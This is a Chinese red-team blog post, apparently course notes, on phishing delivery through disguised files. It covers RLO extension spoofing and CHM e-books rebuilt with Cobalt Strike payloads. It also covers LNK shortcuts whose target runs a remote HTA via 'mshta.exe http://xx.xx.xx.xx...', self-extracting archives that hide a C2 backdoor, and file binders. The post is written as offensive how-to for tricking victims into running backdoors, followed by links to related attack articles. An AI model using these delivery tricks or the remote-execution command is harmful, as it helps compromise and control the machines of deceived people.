红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

Ethan医生2个月前信息收集67

 红队APT-文件后缀-钓鱼伪装-RLO

 红队APT-电子书-CHM-加载JS&PS

 红队APT-快捷方式-LNK-加载&HTA

 红队APT-压缩文件-自解压-释放执行

 红队APT-捆绑文件-打包加载-释放执行

#RLO后缀

命令-插入Unicode字符->RLO模式

 image.png

#CHM电子书

CS生成上线:Attacks——>Web Drive by——>Scripted web Delivery

1、执行JS:见打包资源代码

2、上线JS:见打包资源代码

3、CHM伪装:

找一个正常的CHM电子书,解压后;

将Payload插入其中某个或整个页面;

加载编译,当电子书打开修改页面后上线。

解压命令:hh -decompile .\\html xx.CHM

-bitsadmin 模式

-Powershell 模式

 

#LNK快捷方式:

1、生成:Attacks -> Packages -> Html Application

2、上传:Attacks——>Web Drive by——>Host file

3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext

4、伪装:

-创建快捷方式

image.png

-生成HTA并上传

-属性更改目标执行

-属性更改图标伪装

 

#自解压文件:

安装包&C2后门

1、打包勾选SFX

2、Advanced设置路径

3、Setup设置前后执行

4、Modes设置显示或隐藏

5、Update设置覆盖或更新

6、配合RLO将EXE伪装ZIP压缩

 

#捆绑打包文件:

自带:IExpress

第三方:捆绑器


捆绑比较复杂 因为把正常的程序绑定上去后 会将正常的和后门一起捆绑在一起 导致一起被查杀


相关文章

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-SendCloud转发➢ 红队APT-邮件钓鱼-Gophish批量系统前置内容:钓鱼邮件是指黑客伪装成同...

红队APT-后门逃离篇&无文件内存马&防查杀检测&四种语言&多种框架中间件&自定义生成

➢ 红队APT-后门逃离-无文件内存马&四大语言植入1、出现:在Web安全领域,Webshell一直是一个非常重要且热门的话题。在目前传统安全领域,Webshell根据功能的不同分为...

红队APT-钓鱼投递篇&Office文档&宏代码对象&CVE漏洞&WORD&PPT&EXCEL&WPS类

➢ 红队APT-文件后缀-钓鱼伪装-RLO➢ 红队APT-电子书-CHM-加载JS&PS➢ 红队APT-快捷方式-LNK-加载&HTA➢ 红队A...

漏扫项目篇&武装BURP&浏览器插件&信息收集&分析辅助&遥遥领先

#插件类-武装BurpSuite-漏洞检测&分析辅助漏洞检测类:1、FioraNuclei提供Poc图形界面,实现快速搜索、一键运行等功能,提升体验。https://github.com/bi...

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

蓝队技能-应急响应篇&C2后门&权限维持手法&Windows&Linux基线检查&排查封锁清理

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等➢ 蓝队技能-C2后门&权限维持-基线检查&查杀封锁#C2后门分析处置&权限维持技术处置#Wi...

红队APT-流量隐匿篇&安全测试&反拉黑&隐藏源IP&隧道代理池&秒切IP访问&绕防护设备

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点➢ 红队APT-溯源隐藏-IP通讯&反制拉黑溯源安全态势日...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。